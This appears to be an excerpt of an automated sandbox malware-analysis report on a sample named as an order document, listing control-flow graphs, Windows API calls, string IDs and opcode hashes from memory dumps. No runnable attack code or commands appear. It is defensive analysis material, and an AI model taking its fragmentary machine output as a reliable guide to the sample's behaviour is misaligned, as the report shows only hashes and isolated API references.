                                                  • Instruction Fuzzy Hash: 825123B09007498FDB14DFAAC549B9EBBF1BF88310F20845AE419A7290DB75A941CF66

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 612 38214c68-38214c8c 613 38214c8e-38214c91 612->613 614 38214c93-38214cad 613->614 615 38214cb2-38214cb5 613->615 614->615 616 38215394-38215396 615->616 617 38214cbb-38214db3 615->617 619 38215398 616->619 620 3821539d-382153a0 616->620 635 38214e36-38214e3d 617->635 636 38214db9-38214e06 call 38215511 617->636 619->620 620->613 621 382153a6-382153b3 620->621 637 38214ec1-38214eca 635->637 638 38214e43-38214eb3 635->638 649 38214e0c-38214e28 636->649 637->621 655 38214eb5 638->655 656 38214ebe 638->656 652 38214e33 649->652 653 38214e2a 649->653 652->635 653->652 655->656 656->637
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3727538397.0000000038210000.00000040.00000800.00020000.00000000.sdmp, Offset: 38210000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_38210000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: fq$XPq$\Oq$x=(7$x=(7
                                                  • API String ID: 0-2519135659
                                                  • Opcode ID: 2cf6428a6c99035304d69d68dd62303c377ec342320de856181900b5277a1cb5
                                                  • Instruction ID: e4ff4473cfef305072b03edab2f035a82b940bd69d88f1d8bf9f4d4531c6d8df
                                                  • Opcode Fuzzy Hash: 2cf6428a6c99035304d69d68dd62303c377ec342320de856181900b5277a1cb5
                                                  • Instruction Fuzzy Hash: 21616074E002099FEB149BA4C815BAEBBF7FF88300F208529E509AB396DF754D458F90

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 658 3820d791-3820d7a7 659 3820d7a9-3820d7d0 call 3820aa84 658->659 660 3820d7dd-3820d856 658->660 663 3820d7d5-3820d7d6 659->663 664 3820d861-3820d868 660->664 665 3820d858-3820d85e 660->665 666 3820d873-3820d912 CreateWindowExW 664->666 667 3820d86a-3820d870 664->667 665->664 669 3820d914-3820d91a 666->669 670 3820d91b-3820d953 666->670 667->666 669->670 674 3820d960 670->674 675 3820d955-3820d958 670->675 676 3820d961 674->676 675->674 676->676
                                                  APIs
                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 3820D902
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3727517109.0000000038200000.00000040.00000800.00020000.00000000.sdmp, Offset: 38200000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_38200000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID: CreateWindow
                                                  • String ID: K:}b$K:}b
                                                  • API String ID: 716092398-247851018
                                                  • Opcode ID: d5149a746c667717b29528cd226a84ae5807d5516cb5af1ca221b152aca04cfe
                                                  • Instruction ID: 27479090d64dac6172bead2066bc666a81bd3fc0d8874b1dd0f0d01cdaba241f
                                                  • Opcode Fuzzy Hash: d5149a746c667717b29528cd226a84ae5807d5516cb5af1ca221b152aca04cfe
                                                  • Instruction Fuzzy Hash: 645111B1C00349EFDB11CFA9C980ADDBFB2BF49310F55826AE808AB221C7719885CF50

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 677 3820d7e4-3820d856 679 3820d861-3820d868 677->679 680 3820d858-3820d85e 677->680 681 3820d873-3820d8ab 679->681 682 3820d86a-3820d870 679->682 680->679 683 3820d8b3-3820d912 CreateWindowExW 681->683 682->681 684 3820d914-3820d91a 683->684 685 3820d91b-3820d953 683->685 684->685 689 3820d960 685->689 690 3820d955-3820d958 685->690 691 3820d961 689->691 690->689 691->691
                                                  APIs
                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 3820D902
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3727517109.0000000038200000.00000040.00000800.00020000.00000000.sdmp, Offset: 38200000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_38200000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID: CreateWindow
                                                  • String ID: K:}b$K:}b
                                                  • API String ID: 716092398-247851018
                                                  • Opcode ID: 4ca14b6a5a7cc65f13830ab1b3ed64e2f26fca057c763576ebda00027eafb1d3
                                                  • Instruction ID: 563cb54ccf1fe930580a8e04e00e5bdd2ecac612d26cded44695daebe67b2665
                                                  • Opcode Fuzzy Hash: 4ca14b6a5a7cc65f13830ab1b3ed64e2f26fca057c763576ebda00027eafb1d3
                                                  • Instruction Fuzzy Hash: 1B51C0B5D013499FDB14CFA9C980ADEBBB5BF48310F60822AE819AB210D7759885CF90

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 692 3820d7f0-3820d856 693 3820d861-3820d868 692->693 694 3820d858-3820d85e 692->694 695 3820d873-3820d8ab 693->695 696 3820d86a-3820d870 693->696 694->693 697 3820d8b3-3820d912 CreateWindowExW 695->697 696->695 698 3820d914-3820d91a 697->698 699 3820d91b-3820d953 697->699 698->699 703 3820d960 699->703 704 3820d955-3820d958 699->704 705 3820d961 703->705 704->703 705->705
                                                  APIs
                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 3820D902
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3727517109.0000000038200000.00000040.00000800.00020000.00000000.sdmp, Offset: 38200000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_38200000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID: CreateWindow
                                                  • String ID: K:}b$K:}b
                                                  • API String ID: 716092398-247851018
                                                  • Opcode ID: 97f4cae86676bd6144b605e2875a095b0dae30b71d6a3b6742acb4551ee44e4e
                                                  • Instruction ID: 0667f39c9fe606b25cf356572efcf1b61c32ba6b450b65c966b06193e22aba58
                                                  • Opcode Fuzzy Hash: 97f4cae86676bd6144b605e2875a095b0dae30b71d6a3b6742acb4551ee44e4e
                                                  • Instruction Fuzzy Hash: 0741C2B5D00349DFDB14CF99C980ADEBBB5BF48310F60822AE419AB210D7759845CF90

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 706 385e2570-385e25da OleInitialize 707 385e25dc-385e25e2 706->707 708 385e25e3-385e2600 706->708 707->708
                                                  APIs
                                                  • OleInitialize.OLE32(00000000), ref: 385E25CD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3727763943.00000000385E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 385E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_385e0000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID: Initialize
                                                  • String ID: K:}b$U
                                                  • API String ID: 2538663250-119789817
                                                  • Opcode ID: b462d36a602454383b3da60b5065e3a90cfea88524e241809bfc160163df3e6d
                                                  • Instruction ID: 7f689fdc6c8ddda47760e2d7de80aa7288a5f0e90b8a72604696e431fe5feb42
                                                  • Opcode Fuzzy Hash: b462d36a602454383b3da60b5065e3a90cfea88524e241809bfc160163df3e6d
                                                  • Instruction Fuzzy Hash: 961136B5D007488FDB20DFAAD945BDEBFF4EB49320F10845AE558A7640C375A544CFA1

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 711 38214c59-38214c8c 713 38214c8e-38214c91 711->713 714 38214c93-38214cad 713->714 715 38214cb2-38214cb5 713->715 714->715 716 38215394-38215396 715->716 717 38214cbb-38214db3 715->717 719 38215398 716->719 720 3821539d-382153a0 716->720 735 38214e36-38214e3d 717->735 736 38214db9-38214e06 call 38215511 717->736 719->720 720->713 721 382153a6-382153b3 720->721 737 38214ec1-38214eca 735->737 738 38214e43-38214eb3 735->738 749 38214e0c-38214e28 736->749 737->721 755 38214eb5 738->755 756 38214ebe 738->756 752 38214e33 749->752 753 38214e2a 749->753 752->735 753->752 755->756 756->737
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3727538397.0000000038210000.00000040.00000800.00020000.00000000.sdmp, Offset: 38210000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_38210000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: fq$XPq$x=(7
                                                  • API String ID: 0-1930240131
                                                  • Opcode ID: 0b2a2b184c760cff7cd550c3152e559aca06f475677a837c3ae628b32925b91a
                                                  • Instruction ID: 954015fc8b370a0464306a574350c1a0c3970aaff887c0b3e8d32f7825c94c3c
                                                  • Opcode Fuzzy Hash: 0b2a2b184c760cff7cd550c3152e559aca06f475677a837c3ae628b32925b91a
                                                  • Instruction Fuzzy Hash: 8B514D74A002089FEB149BB9C815B9EBBF6FF88700F248529E505AB396DE759D418B90

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 758 385e0040-385e007c 759 385e012c-385e014c 758->759 760 385e0082-385e0087 758->760 766 385e014f-385e015c 759->766 761 385e00da-385e0112 CallWindowProcW 760->761 762 385e0089-385e00c0 760->762 763 385e011b-385e012a 761->763 764 385e0114-385e011a 761->764 769 385e00c9-385e00d8 762->769 770 385e00c2-385e00c8 762->770 763->766 764->763 769->766 770->769
                                                  APIs
                                                  • CallWindowProcW.USER32(?,?,?,?,?), ref: 385E0101
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3727763943.00000000385E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 385E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_385e0000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID: CallProcWindow
                                                  • String ID: K:}b
                                                  • API String ID: 2714655100-2105567145
                                                  • Opcode ID: 7b2873470f174f82333641f3f5ef392b03085df535e6bd6ed8b0e329bd151c40
                                                  • Instruction ID: f7088ad3f699721c486f0aadfdf9e26596d92169af6b7b9c74d1d85101dea9aa
                                                  • Opcode Fuzzy Hash: 7b2873470f174f82333641f3f5ef392b03085df535e6bd6ed8b0e329bd151c40
                                                  • Instruction Fuzzy Hash: 494127B9A00309CFDB14CF99C884A9ABBF5FF89314F25C459E519AB321D775A841CFA0

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 772 38203450-382034ec DuplicateHandle 773 382034f5-38203512 772->773 774 382034ee-382034f4 772->774 774->773
                                                  APIs
                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 382034DF
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3727517109.0000000038200000.00000040.00000800.00020000.00000000.sdmp, Offset: 38200000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_38200000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID: DuplicateHandle
                                                  • String ID: K:}b
                                                  • API String ID: 3793708945-2105567145
                                                  • Opcode ID: 74f025ff9ec0c126de94aeb3651aec9666b1a2aa946cf10afbc6a11c3049f654
                                                  • Instruction ID: a74256e72660d4c433ffb872e6e46260e3505d593e5dfbed97ffb3b9664750ac
                                                  • Opcode Fuzzy Hash: 74f025ff9ec0c126de94aeb3651aec9666b1a2aa946cf10afbc6a11c3049f654
                                                  • Instruction Fuzzy Hash: FC2100B5D00249AFDB10CFAAD985AEEBBF4FB48310F14845AE959A7210D379A940CF61

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 777 38203458-382034ec DuplicateHandle 778 382034f5-38203512 777->778 779 382034ee-382034f4 777->779 779->778
                                                  APIs
                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 382034DF
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3727517109.0000000038200000.00000040.00000800.00020000.00000000.sdmp, Offset: 38200000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_38200000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID: DuplicateHandle
                                                  • String ID: K:}b
                                                  • API String ID: 3793708945-2105567145
                                                  • Opcode ID: 13253f79a96de8dc9cb083434c326d8159577cd2d7ae310459efbc4a9ff1830d
                                                  • Instruction ID: 64e971373241a90189426fe6e635d4209fea365ce61b903e867f7d3ac421b53b
                                                  • Opcode Fuzzy Hash: 13253f79a96de8dc9cb083434c326d8159577cd2d7ae310459efbc4a9ff1830d
                                                  • Instruction Fuzzy Hash: 8F21E2B5D002099FDB10CFAAD985ADEBBF4FB48320F14841AE958A7310D379A940CFA5

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 782 385e1780-385e25da OleInitialize 784 385e25dc-385e25e2 782->784 785 385e25e3-385e2600 782->785 784->785
                                                  APIs
                                                  • OleInitialize.OLE32(00000000), ref: 385E25CD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3727763943.00000000385E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 385E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_385e0000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID: Initialize
                                                  • String ID: K:}b
                                                  • API String ID: 2538663250-2105567145
                                                  • Opcode ID: c4b6987b8dc5210c70b9d01b4bf6c21f17d2d5dca189dd0c35d4798355653db5
                                                  • Instruction ID: 53248bec118b19d71d891ab018ae398f3d8f76c78ab21915a0d37356bbb7dfc1
                                                  • Opcode Fuzzy Hash: c4b6987b8dc5210c70b9d01b4bf6c21f17d2d5dca189dd0c35d4798355653db5
                                                  • Instruction Fuzzy Hash: 2B1133B5D007088FDB20DFAAC945BDEBBF4EB48320F10841AE518A7200C374A940CFA5

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1237 1287b9-1287cf 1238 1287d1-1287d4 1237->1238 1239 128801-128804 1238->1239 1240 1287d6-1287fc 1238->1240 1241 128806-128812 1239->1241 1242 12881f-128822 1239->1242 1240->1239 1256 12881a 1241->1256 1244 128824-12884a 1242->1244 1245 12884f-128852 1242->1245 1244->1245 1246 128854-12887a 1245->1246 1247 12887f-128882 1245->1247 1246->1247 1251 128884-1288aa 1247->1251 1252 1288af-1288b2 1247->1252 1251->1252 1253 1288b4-1288da 1252->1253 1254 1288df-1288e2 1252->1254 1253->1254 1260 1288e4-12890a 1254->1260 1261 12890f-128912 1254->1261 1256->1242 1260->1261 1262 128914-12893a 1261->1262 1263 12893f-128942 1261->1263 1262->1263 1269 128944-12896a 1263->1269 1270 12896f-128972 1263->1270 1269->1270 1271 128974-12899a 1270->1271 1272 12899f-1289a2 1270->1272 1271->1272 1279 1289a4-1289ca 1272->1279 1280 1289cf-1289d2 1272->1280 1279->1280 1281 1289d4-1289fa 1280->1281 1282 1289ff-128a02 1280->1282 1281->1282 1289 128a04-128a2a 1282->1289 1290 128a2f-128a32 1282->1290 1289->1290 1291 128a34-128a5a 1290->1291 1292 128a5f-128a62 1290->1292 1291->1292 1299 128a64-128a8a 1292->1299 1300 128a8f-128a92 1292->1300 1299->1300 1301 128a94-128aba 1300->1301 1302 128abf-128ac2 1300->1302 1301->1302 1309 128ac4-128aea 1302->1309 1310 128aef-128af2 1302->1310 1309->1310 1311 128af4-128b1a 1310->1311 1312 128b1f-128b22 1310->1312 1311->1312 1319 128b24-128b4a 1312->1319 1320 128b4f-128b52 1312->1320 1319->1320 1321 128b54-128b7a 1320->1321 1322 128b7f-128b82 1320->1322 1321->1322 1329 128b84-128baa 1322->1329 1330 128baf-128bb2 1322->1330 1329->1330 1331 128bb4-128bda 1330->1331 1332 128bdf-128be2 1330->1332 1331->1332 1339 128be4-128c0a 1332->1339 1340 128c0f-128c12 1332->1340 1339->1340 1341 128c14-128c3a 1340->1341 1342 128c3f-128c42 1340->1342 1341->1342 1349 128c44-128c6a 1342->1349 1350 128c6f-128c72 1342->1350 1349->1350 1351 128c74-128c9a 1350->1351 1352 128c9f-128ca2 1350->1352 1351->1352 1359 128ca4-128cca 1352->1359 1360 128ccf-128cd2 1352->1360 1359->1360 1361 128cd4 1360->1361 1362 128cdf-128ce2 1360->1362 1373 128cda 1361->1373 1369 128ce4-128d0a 1362->1369 1370 128d0f-128d12 1362->1370 1369->1370 1371 128d14-128d3a 1370->1371 1372 128d3f-128d42 1370->1372 1371->1372 1378 128d44-128d6a 1372->1378 1379 128d6f-128d72 1372->1379 1373->1362 1378->1379 1381 128d74-128d9a 1379->1381 1382 128d9f-128da2 1379->1382 1381->1382 1386 128db3-128db6 1382->1386 1387 128da4-128da6 1382->1387 1392 128de3-128de6 1386->1392 1393 128db8-128dde 1386->1393 1451 128da8 call 12a0b3 1387->1451 1452 128da8 call 12a010 1387->1452 1453 128da8 call 12a000 1387->1453 1395 128e13-128e16 1392->1395 1396 128de8-128e0e 1392->1396 1393->1392 1402 128e43-128e46 1395->1402 1403 128e18-128e3e 1395->1403 1396->1395 1397 128dae 1397->1386 1405 128e63-128e66 1402->1405 1406 128e48-128e5e 1402->1406 1403->1402 1411 128e93-128e96 1405->1411 1412 128e68-128e8e 1405->1412 1406->1405 1413 128ec3-128ec6 1411->1413 1414 128e98-128ebe 1411->1414 1412->1411 1419 128ef3-128ef6 1413->1419 1420 128ec8-128eee 1413->1420 1414->1413 1422 128f23-128f26 1419->1422 1423 128ef8-128f1e 1419->1423 1420->1419 1429 128f53-128f56 1422->1429 1430 128f28-128f4e 1422->1430 1423->1422 1432 128f83-128f85 1429->1432 1433 128f58-128f7e 1429->1433 1430->1429 1438 128f87 1432->1438 1439 128f8c-128f8f 1432->1439 1433->1432 1438->1439 1439->1238 1444 128f95-128f9b 1439->1444 1451->1397 1452->1397 1453->1397
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3701817892.0000000000120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00120000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_120000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: H(7$(7
                                                  • API String ID: 0-4011298937
                                                  • Opcode ID: 2d14ee772a52cedf8aba4c399378b925e42d889f807ef575def314fab86b60fd
                                                  • Instruction ID: c3824afbf5d9a9bfb828834ed6ca5fc3ee240b043f8a92fbdbbe26b535378bef
                                                  • Opcode Fuzzy Hash: 2d14ee772a52cedf8aba4c399378b925e42d889f807ef575def314fab86b60fd
                                                  • Instruction Fuzzy Hash: 39126231B01211AFDB25AB28E4A526C73A3EBC6305B14892ED005DF796CF75EC57DB81
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3701817892.0000000000120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00120000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_120000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: K:}b$K:}b
                                                  • API String ID: 0-247851018
                                                  • Opcode ID: 8858bde2b2bb85f5e1353bb1f524cc2230fac7323db30012933c40e4ca991e30
                                                  • Instruction ID: ce2d7909355d865057aa8274b0fe900a454571e441f4ec5291d7eec439420f46
                                                  • Opcode Fuzzy Hash: 8858bde2b2bb85f5e1353bb1f524cc2230fac7323db30012933c40e4ca991e30
                                                  • Instruction Fuzzy Hash: C2A14D70E003298FDF24CFA8E9957DDBBF2AF48314F148529D815EB294EB749865CB81
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3701817892.0000000000120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00120000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_120000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: K:}b$K:}b
                                                  • API String ID: 0-247851018
                                                  • Opcode ID: 5afda9123b1c763f0d7f832640b63b90cd3f7ff7813de09459186d65fe973270
                                                  • Instruction ID: 50fdc41a83a6e60cdaf3c89d3e970c1722f05f31122dd93980c69fafe5004b81
                                                  • Opcode Fuzzy Hash: 5afda9123b1c763f0d7f832640b63b90cd3f7ff7813de09459186d65fe973270
                                                  • Instruction Fuzzy Hash: EF918E70E00329CFDF24CFA8E9857EDBBF2AF48314F148529E415A7294DB7499A5CB81
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3727538397.0000000038210000.00000040.00000800.00020000.00000000.sdmp, Offset: 38210000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_38210000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $q$$q
                                                  • API String ID: 0-3126353813
                                                  • Opcode ID: 3b6081f8e152a36b58e9fb533fe630c50a48a966a190e665c68d3472f35551a5
                                                  • Instruction ID: b8517f3a4b65a08c5539a94b3f8fe822d7c97f2b0aefc665bc742616c231797e
                                                  • Opcode Fuzzy Hash: 3b6081f8e152a36b58e9fb533fe630c50a48a966a190e665c68d3472f35551a5
                                                  • Instruction Fuzzy Hash: 8B616E70B102098FDB54DB79D86076EBBE3AF89340F648569D80AEB345EE70DD42CB91
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3701817892.0000000000120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00120000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_120000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: K:}b$K:}b
                                                  • API String ID: 0-247851018
                                                  • Opcode ID: ed01f8b786c09656f8e02d78cf70991eaaa0bf595b2db00178ce0501bd3db4d0
                                                  • Instruction ID: c2264f2e5fdbba6fdf31252bf7d22f4783d4b2623e3ce75f9c56145c2e7c0adb
                                                  • Opcode Fuzzy Hash: ed01f8b786c09656f8e02d78cf70991eaaa0bf595b2db00178ce0501bd3db4d0
                                                  • Instruction Fuzzy Hash: 5C716C70E007598FDF24DFA9E881B9EBBF2AF88314F148129E415A7254EB749891CB91
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3701817892.0000000000120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00120000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_120000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: K:}b$K:}b
                                                  • API String ID: 0-247851018
                                                  • Opcode ID: 463482ce9cd202632dcce58044cc16a2417a1b88615fc8f65077112044633f5c
                                                  • Instruction ID: 471cb79edb2908253115dccac436419a4ed3cccfd4fcb72e6784616c3002115d
                                                  • Opcode Fuzzy Hash: 463482ce9cd202632dcce58044cc16a2417a1b88615fc8f65077112044633f5c
                                                  • Instruction Fuzzy Hash: DB716A70E006698FDF14DFA8E88179EBBF2AF48714F148129E415AB254EB749891CB91
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3701817892.0000000000120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00120000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_120000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: K:}b$K:}b
                                                  • API String ID: 0-247851018
                                                  • Opcode ID: 2e5b949c42068a0c7f7d5b55ad57a8ba849509d2f6e9dc7e479a65a30a9a5d1d
                                                  • Instruction ID: 42a29e7b18efcdaa0433543fa56ad137a10d1540c50cfc6415c0b823b0a7061c
                                                  • Opcode Fuzzy Hash: 2e5b949c42068a0c7f7d5b55ad57a8ba849509d2f6e9dc7e479a65a30a9a5d1d
                                                  • Instruction Fuzzy Hash: 41512274E002288FDB18CFA9D895B9DBBB1FF48300F158529E819BB391DB74A844CF95
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3701817892.0000000000120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00120000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_120000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: K:}b$K:}b
                                                  • API String ID: 0-247851018
                                                  • Opcode ID: a74785a317ce6b96318df6d852cd2d52cb003aa69391c796bb3ad5f22bafff78
                                                  • Instruction ID: 04d7e6b4b2a5b3c9432cbcabbea8eaf2f2ce4d1776badb8127876e90d33c3138
                                                  • Opcode Fuzzy Hash: a74785a317ce6b96318df6d852cd2d52cb003aa69391c796bb3ad5f22bafff78
                                                  • Instruction Fuzzy Hash: 87510274E002288FDB18CFA9D895B9DBBB1BF48310F15812AE819BB295DB749844CF55
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3701817892.0000000000120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00120000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_120000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: PHq
                                                  • API String ID: 0-3820536768
                                                  • Opcode ID: 69b61301a303b32cb29c121a5038abd5b39a749b7fee9c47a39af355fa850914
                                                  • Instruction ID: f51581d0b69b58fe5f782f0d964abb472f41754be87a1cea10830ef823a0fe83
                                                  • Opcode Fuzzy Hash: 69b61301a303b32cb29c121a5038abd5b39a749b7fee9c47a39af355fa850914
                                                  • Instruction Fuzzy Hash: BA71BC31B002259FDB18AF68E4546AEBBB2EB88310F24447DD802EB245DF35DD57CB90
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3727538397.0000000038210000.00000040.00000800.00020000.00000000.sdmp, Offset: 38210000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_38210000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: `<(7
                                                  • API String ID: 0-3539156814
                                                  • Opcode ID: f66855c152f8696713eeff9c77870c33f9deeccb75df8cf675838a2488e9b1c2
                                                  • Instruction ID: 60a8d41f355e1ed29f0ce472ec522078aa679c5bad1d9e8adfc800096c6006c3
                                                  • Opcode Fuzzy Hash: f66855c152f8696713eeff9c77870c33f9deeccb75df8cf675838a2488e9b1c2
                                                  • Instruction Fuzzy Hash: C5912F34E002199FDB10DF68C890B9DBBB2FF85310F248699D54DBB255DB70AA86CB51
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3727538397.0000000038210000.00000040.00000800.00020000.00000000.sdmp, Offset: 38210000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_38210000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: `<(7
                                                  • API String ID: 0-3539156814
                                                  • Opcode ID: 6ffc099f00012bfa5d5065bf02821cf7d4cbbc3a4713253d67f34d39c262c55e
                                                  • Instruction ID: a9d8f658c9721097a20616f2eb956bd98d6bcb7b494f5925fb5968732af0e7cc
                                                  • Opcode Fuzzy Hash: 6ffc099f00012bfa5d5065bf02821cf7d4cbbc3a4713253d67f34d39c262c55e
                                                  • Instruction Fuzzy Hash: 0B911D34E006199BEB10DF68C890B9DB7B2FF89310F208699D54DBB345DB71AA86CF51
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3701817892.0000000000120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00120000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_120000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: LRq
                                                  • API String ID: 0-3187445251
                                                  • Opcode ID: 20cb2974c30ce5692df1d57e05e7798c25df87ea8a4402b854cfe415caeb19a9
                                                  • Instruction ID: 735bc651662a22c26749638a940edb97840f6bb7b02aa9c791e756193ece86cb
                                                  • Opcode Fuzzy Hash: 20cb2974c30ce5692df1d57e05e7798c25df87ea8a4402b854cfe415caeb19a9
                                                  • Instruction Fuzzy Hash: DA318E70E142299FDB25CFA9D4517AFBBB1FF86304F21442AE801EB290EB70DD468B51
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3701817892.0000000000120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00120000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_120000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: LRq
                                                  • API String ID: 0-3187445251
                                                  • Opcode ID: 3b183585f878786973b8c4d7bde8fc44fd328540a14cbc3ba517eb1aa6be6bb5
                                                  • Instruction ID: c12540e5496b8b7403da6cd31570ad98c180be04e3982b7f9980ecfb8e5530b8
                                                  • Opcode Fuzzy Hash: 3b183585f878786973b8c4d7bde8fc44fd328540a14cbc3ba517eb1aa6be6bb5
